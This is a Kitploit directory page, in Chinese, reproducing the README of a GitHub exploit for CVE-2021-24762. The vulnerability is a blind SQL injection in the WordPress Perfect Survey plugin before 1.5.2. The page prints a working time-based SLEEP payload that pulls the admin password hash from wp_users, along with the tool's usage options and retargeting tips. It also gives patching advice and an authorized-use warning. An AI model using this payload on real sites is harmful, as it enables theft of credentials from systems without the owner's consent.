Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Exploit_CVE-2021-24762 — 该仓库展示了针对 CVE-2021-24762 的漏洞利用程序。这是一个盲 SQL 注入(Blind SQLi)漏洞利用程序,在默认配置下可提取管理员密码。 | Kitploit
工具/GitHubGitHub/c4cnm/exploit_cve-2021-24762
密码破解漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubc4cnm/exploit_cve-2021-24762

Exploit_CVE-2021-24762

该仓库展示了针对 CVE-2021-24762 的漏洞利用程序。这是一个盲 SQL 注入(Blind SQLi)漏洞利用程序,在默认配置下可提取管理员密码。

查看仓库
1311个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

exploit_cve-2021-24762

本仓库展示了一个针对 CVE-2021-24762 的漏洞利用程序。这是一个盲 SQL 注入利用程序,在默认配置下可提取管理员密码。

在做基于带 PerfectSurvey 插件的 Wordpress 实验室时,我卡在了一个 SQL 漏洞上。我找到的唯一可用的 PoC 都基于 sqlmap,而且在我工作的实验室中无法正常工作(存在大量额外问题,例如应用返回 404、超时波动过大以及其他问题)。因此我创建了这个工具来利用该实验室。

目标

  • 该 PoC 利用 CVE-2021-24762,该漏洞与 Wordpress 插件 Perfect Survey 相关。 该利用基于带 SLEEP 的 SQL 注入,可获取 'admin' 用户的密码哈希。该用户是 Wordpress 环境的默认用户。
  • 适用版本:运行版本 < 1.5.2 的 Perfect Survey 插件。

影响与严重性

  • CVE-2021-24762:[CVSS 9.8(严重)]
  • 影响:机密性、完整性、可用性、未授权访问。

环境

  • 软件要求:Python3。

使用方法

root@kitploit:~
 ____     _      ___   ____
 / ___|   / \    |_ _| / ___|
| |      / _ \    | |  \___ \
| |___  / ___ \   | |   __ ) |
 \____|/_/   \_\ |___| |____/

   CAIS - Inteligência em Cibersegurança
   Exploit for: CVE-2021-24762

usage: exploit_cve-2021-24762.py [-h] [-u URL] [-p PATH] [-d DELAY] [-t TIMEOUT] [-c CHARSET] [-m MAX_LEN] [-v]

Safe CLI wrapper — receives url/path/delay/timeout/charset and forwards it

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL (default: http://192.168.10.10)
  -p, --path PATH       path (default: /wp-admin/admin-ajax.php)
  -d, --delay DELAY     delay in seconds (default: 30)
  -t, --timeout TIMEOUT
                        timeout in seconds (default: delay + 15)
  -c, --charset CHARSET
                        charset to be used (default: alnum + ./$_-@)
  -m, --max-len MAX_LEN
                        maximum length (default: 20)
  -v, --verbose         activates log debugging
  1. Python 脚本接收上述参数。如果未传入这些参数,脚本将使用其默认值执行。

  2. 理想情况下,你至少需要传入 URL。使用 -u 或 --url 传入。其他参数大概率可以使用默认值。

  3. 在默认配置下,它将获取 admin 用户的密码哈希。该配置体现在 payload 变量的 user_login 值中: payload = f"1 AND (SELECT COUNT(*) FROM (SELECT 1 WHERE ORD(SUBSTRING((SELECT user_pass FROM wp_users WHERE user_login=0x61646d696e),{position},1))={ascii_code} AND SLEEP({delay})) AS a)"

    若你需要获取其他用户的哈希,请根据你的需求更改 "0x61646d696e"(admin)。

风险与局限性

  • 局限性:在当前配置下,该 PoC 只能获取默认数据库结构下 wordpress 的密码哈希。如果你遇到修改过的环境,则需要更改以下 payload: payload = f"1 AND (SELECT COUNT(*) FROM (SELECT 1 WHERE ORD(SUBSTRING((SELECT user_pass FROM wp_users WHERE user_login=0x61646d696e),{position},1))={ascii_code} AND SLEEP({delay})) AS a)"

缓解与修复(建议)

  • 缓解建议:将插件更新至 1.5.2 及以上版本。
  • 参考链接:
    • https://nvd.nist.gov/vuln/detail/CVE-2021-24762
    • https://www.getperfectsurvey.com/

警告与授权

限制使用 — 本仓库包含敏感内容,仅供合乎道德且负责任地使用。 请记住,你必须获得所测试系统所有者的书面许可。任何超出此范围的使用均不被允许,责任将由你自行承担(你想进监狱吗?)。

仓库结构

  • exploit_cve-2021-24762 — 漏洞利用程序。
  • README.ME — 本文件。

更新日志

2025-10-10 — c4cnm — 创建及初始修改

联系方式

  • 作者:Red Team CAIS:/Matheus Camargo (c4cnm),[email protected]。

许可证

GNU General Public License v3 (GPL)

下载工具